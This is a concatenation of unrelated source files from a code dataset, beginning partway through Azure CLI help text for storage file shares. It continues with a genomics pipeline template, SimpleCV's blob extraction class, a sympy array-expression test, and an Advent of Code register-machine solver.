az storage share-rm create -g MyResourceGroup --storage-account mystorageaccount --name myfileshare --quota 6000 --metadata key1=value1 key2=value2
- name: Create a new Azure file share 'myfileshare' with metadata and quota as 10 GB under the storage account 'mystorageaccount' (account id).
text: az storage share-rm create --storage-account mystorageaccount --name myfileshare --quota 10 --metadata key1=value1 key2=value2
"""
helps['storage share-rm delete'] = """
type: command
short-summary: Delete the specified Azure file share.
examples:
- name: Delete an Azure file share 'myfileshare' under the storage account 'mystorageaccount' (account name) in resource group 'MyResourceGroup'.
text: az storage share-rm delete -g MyResourceGroup --storage-account mystorageaccount --name myfileshare
- name: Delete an Azure file share 'myfileshare' under the storage account 'mystorageaccount' (account id).
text: az storage share-rm delete --storage-account mystorageaccount --name myfileshare
- name: Delete an Azure file share by resource id.
text: az storage share-rm delete --ids file-share-id
"""
helps['storage share-rm exists'] = """
type: command
short-summary: Check for the existence of an Azure file share.
examples:
- name: Check for the existence of an Azure file share 'myfileshare' under the storage account 'mystorageaccount' (account name) in resource group 'MyResourceGroup'.
text: az storage share-rm exists -g MyResourceGroup --storage-account mystorageaccount --name myfileshare
- name: Check for the existence of an Azure file share 'myfileshare' under the storage account 'mystorageaccount' (account id).
text: az storage share-rm exists --storage-account mystorageaccount --name myfileshare
- name: Check for the existence of an Azure file share by resource id.
text: az storage share-rm exists --ids file-share-id
"""
helps['storage share-rm list'] = """
type: command
short-summary: List the Azure file shares under the specified storage account.
examples:
- name: List the Azure file shares under the storage account 'mystorageaccount' (account name) in resource group 'MyResourceGroup'.
text: az storage share-rm list -g MyResourceGroup --storage-account mystorageaccount
- name: List the Azure file shares under the storage account 'mystorageaccount' (account id).
text: az storage share-rm list --storage-account mystorageaccount
"""
helps['storage share-rm show'] = """
type: command
short-summary: Show the properties for a specified Azure file share.
examples:
- name: Show the properties for an Azure file share 'myfileshare' under the storage account 'mystorageaccount' (account name) in resource group 'MyResourceGroup'.
text: az storage share-rm show -g MyResourceGroup --storage-account mystorageaccount --name myfileshare
- name: Show the properties for an Azure file share 'myfileshare' under the storage account 'mystorageaccount' (account id).
text: az storage share-rm show --storage-account mystorageaccount --name myfileshare
- name: Show the properties of an Azure file shares by resource id.
text: az storage share-rm show --ids file-share-id
"""
helps['storage share-rm update'] = """
type: command
short-summary: Update the properties for an Azure file share.
examples:
- name: Update the properties for an Azure file share 'myfileshare' under the storage account 'mystorageaccount' (account name) in resource group 'MyResourceGroup'.
text: az storage share-rm update -g MyResourceGroup --storage-account mystorageaccount --name myfileshare --quota 3 --metadata key1=value1 key2=value2
- name: Update the properties for an Azure file share 'myfileshare' under the storage account 'mystorageaccount' (account id).
text: az storage share-rm update --storage-account mystorageaccount --name myfileshare --quota 3 --metadata key1=value1 key2=value2
- name: Update the properties for an Azure file shares by resource id.
text: az storage share-rm update --ids file-share-id --quota 3 --metadata key1=value1 key2=value2
"""
helps['storage share'] = """
type: group
short-summary: Manage file shares.
"""
helps['storage share create'] = """
type: command
short-summary: Creates a new share under the specified account.
examples:
- name: Creates a new share under the specified account. (autogenerated)
text: |
az storage share create --account-name MyAccount --name MyFileShare
crafted: true
"""
helps['storage share exists'] = """
type: command
short-summary: Check for the existence of a file share.
examples:
- name: Check for the existence of a file share. (autogenerated)
text: |
az storage share exists --account-key 00000000 --account-name MyAccount --name MyFileShare
crafted: true
- name: Check for the existence of a file share (autogenerated)
text: |
az storage share exists --connection-string $connectionString --name MyFileShare
crafted: true
"""
helps['storage share generate-sas'] = """
type: command
examples:
- name: Generate a sas token for a fileshare and use it to upload a file.
text: |
end=`date -u -d "30 minutes" '+%Y-%m-%dT%H:%MZ'`
sas=`az storage share generate-sas -n MyShare --account-name MyStorageAccount --https-only --permissions dlrw --expiry $end -o tsv`
az storage file upload -s MyShare --account-name MyStorageAccount --source file.txt --sas-token $sas
- name: Generate a shared access signature for the share. (autogenerated)
text: |
az storage share generate-sas --account-key 00000000 --account-name MyStorageAccount --expiry 2037-12-31T23:59:00Z --name MyShare --permissions dlrw
crafted: true
- name: Generate a shared access signature for the share. (autogenerated)
text: |
az storage share generate-sas --connection-string $connectionString --expiry 2019-02-01T12:20Z --name MyShare --permissions dlrw
crafted: true
"""
helps['storage share list'] = """
type: command
short-summary: List the file shares in a storage account.
"""
helps['storage share metadata'] = """
type: group
short-summary: Manage the metadata of a file share.
"""
helps['storage share policy'] = """
type: group
short-summary: Manage shared access policies of a storage file share.
"""
helps['storage share url'] = """
type: command
short-summary: Create a URI to access a file share.
examples:
- name: Create a URI to access a file share. (autogenerated)
text: |
az storage share url --account-key 00000000 --account-name MyAccount --name MyFileShare
crafted: true
"""
helps['storage table'] = """
type: group
short-summary: Manage NoSQL key-value storage.
"""
helps['storage table list'] = """
type: command
short-summary: List tables in a storage account.
"""
helps['storage table policy'] = """
type: group
short-summary: Manage shared access policies of a storage table.
"""
# Duplicate assignment for the `storage queue` group: this later entry wins
# over the earlier one, so it must carry the correct summary.
# BUGFIX: its short-summary was copy-pasted from 'storage table policy'
# ("Manage shared access policies of a storage table."); restored the queue
# group's own summary to match the earlier definition.
helps['storage queue'] = """
type: group
short-summary: Manage storage queues.
long-summary: >
Please specify one of the following authentication parameters for your commands: --auth-mode, --account-key,
--connection-string, --sas-token. You also can use corresponding environment variables to store your authentication
credentials, e.g. AZURE_STORAGE_KEY, AZURE_STORAGE_CONNECTION_STRING and AZURE_STORAGE_SAS_TOKEN.
"""
| 50.483078 | 417 | 0.734306 |
e2a0387552e4669637861a8103e4af53e322bd8e | 5,145 | py | Python | pipeline_template_new.py | linlabcode/pipeline | 396ff17a67c9323024b9448665529142b6aa18be | [
"MIT"
] | 3 | 2017-10-05T10:04:48.000Z | 2018-11-15T17:19:58.000Z | pipeline_template_new.py | linlabcode/pipeline | 396ff17a67c9323024b9448665529142b6aa18be | [
"MIT"
] | 2 | 2017-02-14T14:33:55.000Z | 2018-12-27T11:30:51.000Z | pipeline_template_new.py | linlabcode/pipeline | 396ff17a67c9323024b9448665529142b6aa18be | [
"MIT"
] | 10 | 2016-09-07T18:02:30.000Z | 2019-02-28T00:11:24.000Z | #!/usr/bin/python
'''
The MIT License (MIT)
Copyright (c) 2018 Charles Lin
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
#Main method run script for processing of slam seq analysis from Muhar et al., 2018
#==========================================================================
#=============================DEPENDENCIES=================================
#==========================================================================

import sys, os

# Get the script's full local path so the shared pipeline modules resolve.
whereAmI = os.path.dirname(os.path.realpath(__file__))
pipeline_dir = '/storage/cylin/bin/pipeline/'
sys.path.append(whereAmI)
sys.path.append(pipeline_dir)

import pipeline_dfci
import utils
import string
import numpy
import os  # NOTE(review): duplicate of the `os` import above; harmless, kept for safety
import re
from collections import defaultdict
import subprocess

#==========================================================================
#============================PARAMETERS====================================
#==========================================================================

projectName = 'slam_seq'
genome = 'hg38'
annotFile = '%s/annotation/%s_refseq.ucsc' % (pipeline_dir, genome)

#project folders
projectFolder = '/storage/cylin/grail/projects/%s' % (projectName)  #PATH TO YOUR PROJECT FOLDER
projectFolder = utils.formatFolder(projectFolder, True)

#standard folder names
gffFolder = '%sgff/' % (projectFolder)
macsFolder = '%smacsFolder/' % (projectFolder)
macsEnrichedFolder = '%smacsEnriched/' % (projectFolder)
mappedEnrichedFolder = '%smappedEnriched/' % (projectFolder)
mappedFolder = '%smappedFolder/' % (projectFolder)
wiggleFolder = '%swiggles/' % (projectFolder)
metaFolder = '%smeta/' % (projectFolder)
metaRoseFolder = '%smeta_rose/' % (projectFolder)
roseFolder = '%srose/' % (projectFolder)
fastaFolder = '%sfasta/' % (projectFolder)
figuresFolder = '%sfigures/' % (projectFolder)
geneListFolder = '%sgeneListFolder/' % (projectFolder)
# BUGFIX: bedFolder was assigned twice ('%sbed/' then '%sbeds/'); the first
# assignment was dead code, so only the effective '%sbeds/' value is kept.
bedFolder = '%sbeds/' % (projectFolder)
signalFolder = '%ssignalTables/' % (projectFolder)
tableFolder = '%stables/' % (projectFolder)

#mask Files
#genomeDirectory #select your genome
#genomeDirectory = '/grail/genomes/Mus_musculus/UCSC/mm9/Sequence/Chromosomes/'
#genomeDirectory = '/grail/genomes/Mus_musculus/UCSC/hg19/Sequence/Chromosomes/'

#making folders
folderList = [gffFolder, macsFolder, macsEnrichedFolder, mappedEnrichedFolder, mappedFolder, wiggleFolder, metaFolder, metaRoseFolder, roseFolder, fastaFolder, figuresFolder, geneListFolder, bedFolder, signalFolder, tableFolder]

for folder in folderList:
    # Restored loop-body indentation (stripped in the source dump).
    pipeline_dfci.formatFolder(folder, True)

#==========================================================================
#============================LIST OF DATAFILES=============================
#==========================================================================
#this project will utilize multiple datatables
#data tables are organized largely by type/system
#some data tables overlap for ease of analysis

#ChIP-Seq
chip_data_file = '%sdata_tables/HG38_K562_DATA_TABLE.txt' % (projectFolder)

#==========================================================================
#===========================MAIN METHOD====================================
#==========================================================================
def main():
    """Run the main analysis for the project: load and sanity-check annotation."""
    print('main analysis for project %s' % (projectName))
    print('changing directory to project folder')
    os.chdir(projectFolder)

    print('\n\n')
    print('#======================================================================')
    print('#======================I. LOADING DATA ANNOTATION======================')
    print('#======================================================================')
    print('\n\n')

    # This section sanity checks each data table and makes sure both bam
    # and .bai files are accessible.
    # BUG FIX: the original called pipeline_dfci.summary(data_file), but no
    # variable named data_file exists in this module; the ChIP-Seq data
    # table is stored in chip_data_file.
    pipeline_dfci.summary(chip_data_file)


#==========================================================================
#==================================THE END=================================
#==========================================================================

if __name__ == "__main__":
    main()
| 33.627451 | 214 | 0.577065 |
fbc2e525c1c5a58efcff08c48f1071f63a34f477 | 12,299 | py | Python | SimpleCV/Features/BlobMaker.py | ingenuitas/SimpleCV | f9ed8ba40a36423f9beac6931590297a8bb5b064 | [
"BSD-3-Clause"
] | 14 | 2015-02-10T13:07:27.000Z | 2021-02-10T16:26:48.000Z | SimpleCV/Features/BlobMaker.py | hav3n/SimpleCV | a9bb3fc2eb7b47d2ae106c2e8efc28b61eb497c1 | [
"BSD-3-Clause"
] | null | null | null | SimpleCV/Features/BlobMaker.py | hav3n/SimpleCV | a9bb3fc2eb7b47d2ae106c2e8efc28b61eb497c1 | [
"BSD-3-Clause"
] | 16 | 2015-02-23T21:18:28.000Z | 2019-04-17T11:10:28.000Z | from SimpleCV.base import *
#import cv2 as cv2
class BlobMaker:
    """
    Blob maker encapsulates all of the contour extraction process and data, so
    it can be used inside the image class, or extended and used outside the image
    class. The general idea is that the blob maker provides the utilities that one
    would use for blob extraction. Later implementations may include tracking and
    other features.
    """
    # Scratch storage shared by the legacy OpenCV contour-finding calls.
    mMemStorage = None

    def __init__(self):
        self.mMemStorage = cv.CreateMemStorage()

    def extractUsingModel(self, img, colormodel, minsize=10, maxsize=0):
        """
        Extract blobs using a color model.

        img        - The input image
        colormodel - The ColorModel object used to threshold the image.
        minsize    - The minimum size of the returned features.
        maxsize    - The maximum size of the returned features; 0 uses the
                     whole image area as the limit.

        Returns a FeatureSet of blobs sorted by area, largest first.
        """
        if (maxsize <= 0):
            maxsize = img.width * img.height
        gray = colormodel.threshold(img)
        # BUG FIX: the original passed keywords minArea/maxArea, which do not
        # exist on extractFromBinary (its parameters are minsize/maxsize) and
        # raised a TypeError.
        blobs = self.extractFromBinary(gray, img, minsize=minsize, maxsize=maxsize)
        retVal = sorted(blobs, key=lambda x: x.mArea, reverse=True)
        return FeatureSet(retVal)

    def extract(self, img, threshval=127, minsize=10, maxsize=0, threshblocksize=3, threshconstant=5):
        """
        Perform a threshold operation on the input image and then extract and
        return the blobs.

        img             - The input image (color or b&w)
        threshval       - The threshold value for the binarize operation. If
                          threshval = -1 adaptive thresholding is used.
        minsize         - The minimum blob size in pixels.
        maxsize         - The maximum blob size in pixels; 0 uses the whole
                          image area as the limit.
        threshblocksize - The adaptive threshold block size.
        threshconstant  - The minimum to subtract off the adaptive threshold.
        """
        if (maxsize <= 0):
            maxsize = img.width * img.height
        # Create a single channel image, thresholded to parameters.
        blobs = self.extractFromBinary(
            img.binarize(threshval, 255, threshblocksize, threshconstant).invert(),
            img, minsize, maxsize)
        retVal = sorted(blobs, key=lambda x: x.mArea, reverse=True)
        return FeatureSet(retVal)

    def extractFromBinary(self, binaryImg, colorImg, minsize=5, maxsize=-1, appx_level=3):
        """
        Perform blob extraction given a binary source image that is used
        to get the blob outlines, and a color source image.

        binaryImg  - The binary image with the blobs.
        colorImg   - The color image.
        minsize    - The minimum size of the blobs in pixels.
        maxsize    - The maximum blob size in pixels; values <= 0 use the
                     whole image area as the limit.
        appx_level - The blob approximation level - an integer for the maximum
                     distance between the true edge and the approximation edge -
                     lower numbers yield better approximation.
        """
        # If you hit this recursion limit may god have mercy on your soul.
        # If you really are having problems set the value higher, but this means
        # you have over 10,000,000 blobs in your image.
        sys.setrecursionlimit(5000)
        # h_next moves to the next external contour
        # v_next() moves to the next internal contour
        if (maxsize <= 0):
            maxsize = colorImg.width * colorImg.height

        retVal = []
        test = binaryImg.meanColor()
        if (test[0] == 0.00 and test[1] == 0.00 and test[2] == 0.00):
            return FeatureSet(retVal)

        # There are a couple of weird corner cases with the opencv
        # connect components libraries - when you try to find contours
        # in an all black image, or an image with a single white pixel
        # that sits on the edge of an image the whole thing explodes
        # this check catches those bugs. -KAS
        # Also I am submitting a bug report to Willow Garage - please bare with us.
        ptest = (4 * 255.0) / (binaryImg.width * binaryImg.height)  # val if two pixels are white
        if (test[0] <= ptest and test[1] <= ptest and test[2] <= ptest):
            # CONSISTENCY FIX: wrap in FeatureSet like every other return path
            # (the original returned a bare list here).
            return FeatureSet(retVal)

        seq = cv.FindContours(binaryImg._getGrayscaleBitmap(), self.mMemStorage,
                              cv.CV_RETR_TREE, cv.CV_CHAIN_APPROX_SIMPLE)
        try:
            # note to self
            # http://code.activestate.com/recipes/474088-tail-call-optimization-decorator/
            retVal = self._extractFromBinary(seq, False, colorImg, minsize, maxsize, appx_level)
        except RuntimeError:
            logger.warning("You exceeded the recursion limit. This means you probably have too many blobs in your image. We suggest you do some morphological operations (erode/dilate) to reduce the number of blobs in your image. This function was designed to max out at about 5000 blobs per image.")
        except Exception:
            # BUG FIX: the original read `except e:`, which is not a valid
            # catch-all (it would raise NameError if the previous handler had
            # not bound e, or catch the wrong type if it had).
            logger.warning("SimpleCV Find Blobs Failed - This could be an OpenCV python binding issue")
        del seq
        return FeatureSet(retVal)

    def _extractFromBinary(self, seq, isaHole, colorImg, minsize, maxsize, appx_level):
        """
        The recursive entry point for the blob extraction. The blobs and holes
        are presented as a tree and we traverse up and across the tree.
        """
        retVal = []
        if (seq is None):
            return retVal

        nextLayerDown = []
        while True:
            if (not isaHole):  # if we aren't a hole then we are an object, so get and return our features
                temp = self._extractData(seq, colorImg, minsize, maxsize, appx_level)
                if (temp is not None):
                    retVal.append(temp)
            nextLayer = seq.v_next()
            if nextLayer is not None:
                nextLayerDown.append(nextLayer)
            seq = seq.h_next()
            if seq is None:
                break
        for nextLayer in nextLayerDown:
            # Children of objects are holes and vice versa, so flip isaHole.
            retVal += self._extractFromBinary(nextLayer, not isaHole, colorImg, minsize, maxsize, appx_level)
        return retVal

    def _extractData(self, seq, color, minsize, maxsize, appx_level):
        """
        Extract the bulk of the data from a given blob. If the blob's area is
        too large or too small the method returns None.
        """
        if (seq is None or not len(seq)):
            return None
        area = cv.ContourArea(seq)
        if (area < minsize or area > maxsize):
            return None

        retVal = Blob()
        retVal.image = color
        retVal.mArea = area

        retVal.mMinRectangle = cv.MinAreaRect2(seq)
        bb = cv.BoundingRect(seq)
        retVal.x = bb[0] + (bb[2] / 2)
        retVal.y = bb[1] + (bb[3] / 2)
        retVal.mPerimeter = cv.ArcLength(seq)
        if (seq is not None):  # KAS
            retVal.mContour = list(seq)

        try:
            # Best effort: cv2 may not be installed alongside the legacy cv
            # bindings; skip the polygon approximation if anything fails.
            import cv2
            if (retVal.mContour is not None):
                retVal.mContourAppx = []
                appx = cv2.approxPolyDP(np.array([retVal.mContour], 'float32'), appx_level, True)
                for p in appx:
                    retVal.mContourAppx.append((int(p[0][0]), int(p[0][1])))
        except Exception:
            pass

        # so this is a bit hacky....
        # For blobs that live right on the edge of the image OpenCV reports the position and width
        # height as being one over for the true position. E.g. if a blob is at (0,0) OpenCV reports
        # its position as (1,1). Likewise the width and height for the other corners is reported as
        # being one less than the width and height. This is a known bug.
        xx = bb[0]
        yy = bb[1]
        ww = bb[2]
        hh = bb[3]
        retVal.points = [(xx, yy), (xx + ww, yy), (xx + ww, yy + hh), (xx, yy + hh)]
        retVal._updateExtents()
        chull = cv.ConvexHull2(seq, cv.CreateMemStorage(), return_points=1)
        retVal.mConvexHull = list(chull)
        # KAS -- FLAG FOR REPLACE 6/6/2012
        #hullMask = self._getHullMask(chull,bb)
        # KAS -- FLAG FOR REPLACE 6/6/2012
        #retVal.mHullImg = self._getBlobAsImage(chull,bb,color.getBitmap(),hullMask)
        # KAS -- FLAG FOR REPLACE 6/6/2012
        #retVal.mHullMask = Image(hullMask)
        del chull

        moments = cv.Moments(seq)
        # This is a hack for a python wrapper bug that was missing
        # the constants required from the ctype
        retVal.m00 = area
        try:
            retVal.m10 = moments.m10
            retVal.m01 = moments.m01
            retVal.m11 = moments.m11
            retVal.m20 = moments.m20
            retVal.m02 = moments.m02
            retVal.m21 = moments.m21
            retVal.m12 = moments.m12
        except AttributeError:
            # Older wrappers do not expose the moment attributes directly.
            retVal.m10 = cv.GetSpatialMoment(moments, 1, 0)
            retVal.m01 = cv.GetSpatialMoment(moments, 0, 1)
            retVal.m11 = cv.GetSpatialMoment(moments, 1, 1)
            retVal.m20 = cv.GetSpatialMoment(moments, 2, 0)
            retVal.m02 = cv.GetSpatialMoment(moments, 0, 2)
            retVal.m21 = cv.GetSpatialMoment(moments, 2, 1)
            retVal.m12 = cv.GetSpatialMoment(moments, 1, 2)
        retVal.mHu = cv.GetHuMoments(moments)

        # KAS -- FLAG FOR REPLACE 6/6/2012
        mask = self._getMask(seq, bb)
        #retVal.mMask = Image(mask)

        retVal.mAvgColor = self._getAvg(color.getBitmap(), bb, mask)
        retVal.mAvgColor = retVal.mAvgColor[0:3]
        #retVal.mAvgColor = self._getAvg(color.getBitmap(),retVal.mBoundingBox,mask)
        #retVal.mAvgColor = retVal.mAvgColor[0:3]

        # KAS -- FLAG FOR REPLACE 6/6/2012
        #retVal.mImg = self._getBlobAsImage(seq,bb,color.getBitmap(),mask)

        retVal.mHoleContour = self._getHoles(seq)
        retVal.mAspectRatio = retVal.mMinRectangle[1][0] / retVal.mMinRectangle[1][1]

        return retVal

    def _getHoles(self, seq):
        """
        Return the holes associated with a blob as a list of point lists,
        or None if the blob has no holes.
        """
        retVal = None
        holes = seq.v_next()
        if (holes is not None):
            retVal = [list(holes)]
            while (holes.h_next() is not None):
                holes = holes.h_next()
                temp = list(holes)
                if (len(temp) >= 3):  # exclude single pixel holes
                    retVal.append(temp)
        return retVal

    def _getMask(self, seq, bb):
        """
        Return a binary image (mask) of a particular contour sequence,
        with any holes drawn back in as black.
        """
        mask = cv.CreateImage((bb[2], bb[3]), cv.IPL_DEPTH_8U, 1)
        cv.Zero(mask)
        cv.DrawContours(mask, seq, (255), (0), 0, thickness=-1, offset=(-1 * bb[0], -1 * bb[1]))
        holes = seq.v_next()
        if (holes is not None):
            cv.DrawContours(mask, holes, (0), (255), 0, thickness=-1, offset=(-1 * bb[0], -1 * bb[1]))
            while (holes.h_next() is not None):
                holes = holes.h_next()
                if (holes is not None):
                    cv.DrawContours(mask, holes, (0), (255), 0, thickness=-1, offset=(-1 * bb[0], -1 * bb[1]))
        return mask

    def _getHullMask(self, hull, bb):
        """
        Return a mask of the convex hull of a blob.
        """
        bb = cv.BoundingRect(hull)
        mask = cv.CreateImage((bb[2], bb[3]), cv.IPL_DEPTH_8U, 1)
        cv.Zero(mask)
        cv.DrawContours(mask, hull, (255), (0), 0, thickness=-1, offset=(-1 * bb[0], -1 * bb[1]))
        return mask

    def _getAvg(self, colorbitmap, bb, mask):
        """
        Calculate the average color of a blob given the mask.
        """
        cv.SetImageROI(colorbitmap, bb)
        # may need the offset parameter
        avg = cv.Avg(colorbitmap, mask)
        cv.ResetImageROI(colorbitmap)
        return avg

    def _getBlobAsImage(self, seq, bb, colorbitmap, mask):
        """
        Return an image that contains just the pixels defined by the blob sequence.
        """
        cv.SetImageROI(colorbitmap, bb)
        outputImg = cv.CreateImage((bb[2], bb[3]), cv.IPL_DEPTH_8U, 3)
        cv.Zero(outputImg)
        cv.Copy(colorbitmap, outputImg, mask)
        cv.ResetImageROI(colorbitmap)
        return (Image(outputImg))
from SimpleCV.ImageClass import Image
from SimpleCV.Features.Features import FeatureSet
from SimpleCV.Features.Blob import Blob
| 40.19281 | 299 | 0.61005 |
1b687a77cbb03c16d138693d050c1be02eb29de1 | 761 | py | Python | simplyscript_django/urls.py | kokhoor/SimplyScript_django | 6d7f12af400a14a2415893dabfed8746dda46a9f | [
"Apache-2.0"
] | null | null | null | simplyscript_django/urls.py | kokhoor/SimplyScript_django | 6d7f12af400a14a2415893dabfed8746dda46a9f | [
"Apache-2.0"
] | null | null | null | simplyscript_django/urls.py | kokhoor/SimplyScript_django | 6d7f12af400a14a2415893dabfed8746dda46a9f | [
"Apache-2.0"
] | null | null | null | """simplyscript_django URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
    # Django admin interface at /admin/.
    path('admin/', admin.site.urls),
]
| 34.590909 | 77 | 0.713535 |
107a5e35b2847e17b36a7e72cc9765c9c287e8fa | 2,423 | py | Python | sympy/tensor/array/expressions/tests/test_as_explicit.py | shilpiprd/sympy | 556e9c61b31d0d5f101cd56b43e843fbf3bcf121 | [
"BSD-3-Clause"
] | 8,323 | 2015-01-02T15:51:43.000Z | 2022-03-31T13:13:19.000Z | sympy/tensor/array/expressions/tests/test_as_explicit.py | shilpiprd/sympy | 556e9c61b31d0d5f101cd56b43e843fbf3bcf121 | [
"BSD-3-Clause"
] | 15,102 | 2015-01-01T01:33:17.000Z | 2022-03-31T22:53:13.000Z | sympy/tensor/array/expressions/tests/test_as_explicit.py | shilpiprd/sympy | 556e9c61b31d0d5f101cd56b43e843fbf3bcf121 | [
"BSD-3-Clause"
] | 4,490 | 2015-01-01T17:48:07.000Z | 2022-03-31T17:24:05.000Z | from sympy import ImmutableDenseNDimArray, tensorproduct, MatrixSymbol, tensorcontraction, tensordiagonal, permutedims, \
Symbol
from sympy.tensor.array.expressions.array_expressions import ZeroArray, OneArray, ArraySymbol, \
ArrayTensorProduct, PermuteDims, ArrayDiagonal, ArrayContraction, ArrayAdd
from sympy.testing.pytest import raises
def test_array_as_explicit_call():
    """as_explicit on array expressions built from ArraySymbol operands."""
    assert ZeroArray(3, 2, 4).as_explicit() == ImmutableDenseNDimArray.zeros(3, 2, 4)
    all_ones = ImmutableDenseNDimArray([1 for i in range(3*2*4)]).reshape(3, 2, 4)
    assert OneArray(3, 2, 4).as_explicit() == all_ones

    k = Symbol("k")
    X = ArraySymbol("X", k, 3, 2)
    # Symbolic dimensions cannot be made explicit.
    raises(ValueError, lambda: X.as_explicit())
    raises(ValueError, lambda: ZeroArray(k, 2, 3).as_explicit())
    raises(ValueError, lambda: OneArray(2, k, 2).as_explicit())

    A = ArraySymbol("A", 3, 3)
    B = ArraySymbol("B", 3, 3)

    product = tensorproduct(A, B)
    assert isinstance(product, ArrayTensorProduct)
    assert product.as_explicit() == tensorproduct(A.as_explicit(), B.as_explicit())

    trace = tensorcontraction(A, (0, 1))
    assert isinstance(trace, ArrayContraction)
    assert trace.as_explicit() == A[0, 0] + A[1, 1] + A[2, 2]

    diagonal = tensordiagonal(A, (0, 1))
    assert isinstance(diagonal, ArrayDiagonal)
    assert diagonal.as_explicit() == ImmutableDenseNDimArray([A[0, 0], A[1, 1], A[2, 2]])

    transposed = permutedims(A, [1, 0])
    assert isinstance(transposed, PermuteDims)
    assert transposed.as_explicit() == permutedims(A.as_explicit(), [1, 0])
def test_array_as_explicit_matrix_symbol():
    """as_explicit on array expressions built from MatrixSymbol operands."""
    A = MatrixSymbol("A", 3, 3)
    B = MatrixSymbol("B", 3, 3)

    product = tensorproduct(A, B)
    assert isinstance(product, ArrayTensorProduct)
    assert product.as_explicit() == tensorproduct(A.as_explicit(), B.as_explicit())

    trace = tensorcontraction(A, (0, 1))
    assert isinstance(trace, ArrayContraction)
    assert trace.as_explicit() == A[0, 0] + A[1, 1] + A[2, 2]

    diagonal = tensordiagonal(A, (0, 1))
    assert isinstance(diagonal, ArrayDiagonal)
    assert diagonal.as_explicit() == ImmutableDenseNDimArray([A[0, 0], A[1, 1], A[2, 2]])

    transposed = permutedims(A, [1, 0])
    assert isinstance(transposed, PermuteDims)
    assert transposed.as_explicit() == permutedims(A.as_explicit(), [1, 0])

    # Addition of tensor products distributes over as_explicit.
    expr = ArrayAdd(ArrayTensorProduct(A, B), ArrayTensorProduct(B, A))
    assert expr.as_explicit() == expr.args[0].as_explicit() + expr.args[1].as_explicit()
ca437d905b6c26a81af3fb014e39b7bd82767d8b | 3,304 | py | Python | 2015/23-opening_lock/solve.py | BrendanLeber/adventofcode | ea12330888b22609d4b7c849d388e42ed56291a8 | [
"MIT"
] | null | null | null | 2015/23-opening_lock/solve.py | BrendanLeber/adventofcode | ea12330888b22609d4b7c849d388e42ed56291a8 | [
"MIT"
] | null | null | null | 2015/23-opening_lock/solve.py | BrendanLeber/adventofcode | ea12330888b22609d4b7c849d388e42ed56291a8 | [
"MIT"
] | 1 | 2019-03-21T16:21:03.000Z | 2019-03-21T16:21:03.000Z | # -*- coding: utf-8 -*-
import argparse
import pdb
import traceback
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple
@dataclass
class Instruction:
    """A single instruction for the Turing-lock computer.

    name   - opcode (hlf, tpl, inc, jmp, jie, jio)
    reg    - target register ("a"/"b"), or None for jmp
    offset - jump offset, or None for non-jump register ops
    """

    name: str
    reg: Optional[str]
    offset: Optional[int]

    def __str__(self) -> str:
        """Render the instruction in its assembly source form."""
        if self.name in ("hlf", "tpl", "inc"):
            return f"{self.name} {self.reg}"
        if self.name in ("jie", "jio"):
            return f"{self.name} {self.reg}, {self.offset}"
        if self.name == "jmp":
            return f"{self.name} {self.offset}"
        # BUG FIX: corrected the typo "Unkown" in the error message.
        raise ValueError(f"Unknown instruction: {self.name}")
def execute(program: List[Instruction], regs: Dict[str, int], verbose=False) -> Dict[str, int]:
    """Run *program* until the instruction pointer leaves it; return the registers."""
    ip: int = 0
    while ip < len(program):
        inst = program[ip]
        if verbose:
            print(f"{ip:05d}: {inst!s} {regs}")
        step = 1  # default: fall through to the next instruction
        if inst.name == "hlf":  # half r
            regs[inst.reg] //= 2
        elif inst.name == "tpl":  # triple r
            regs[inst.reg] *= 3
        elif inst.name == "inc":  # increment r
            regs[inst.reg] += 1
        elif inst.name == "jmp":  # unconditional jump
            step = inst.offset
        elif inst.name == "jie" and regs[inst.reg] % 2 == 0:  # jump if r is even
            step = inst.offset
        elif inst.name == "jio" and regs[inst.reg] == 1:  # jump if r is one
            step = inst.offset
        ip += step
    if verbose:
        print(f"final state: ip:{ip} regs:{regs}")
    return regs
def solve(program: List[Instruction], verbose=False) -> Tuple[int, int]:
    """Return register b after running with a=0 (part one) and a=1 (part two)."""
    part_one = execute(program, {"a": 0, "b": 0}, verbose)["b"]
    part_two = execute(program, {"a": 1, "b": 0}, verbose)["b"]
    return (part_one, part_two)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Advent of Code - 2015 - Day 23 - Opening the Turing Lock."
)
parser.add_argument(
"input",
type=str,
default="input.txt",
nargs="?",
help="The puzzle input. (Default %(default)s)",
)
parser.add_argument(
"--verbose",
action="store_true",
default=False,
help="Display extra info. (Default: %(default)s)",
)
args = parser.parse_args()
program: List[Instruction] = []
with open(args.input) as inf:
for line in inf:
parts = line.strip().split()
if parts[0] in ["inc", "tpl", "hlf"]:
inst = Instruction(parts[0], parts[1], None)
elif parts[0] in ["jie", "jio"]:
inst = Instruction(parts[0], parts[1][0], int(parts[2]))
elif parts[0] in ["jmp"]:
inst = Instruction(parts[0], None, int(parts[1]))
else:
raise ValueError("unknown instruction '{line.strip()}'")
program.append(inst)
try:
print(solve(program, verbose=args.verbose))
except Exception:
traceback.print_exc()
pdb.post_mortem()
| 28.730435 | 95 | 0.516041 |
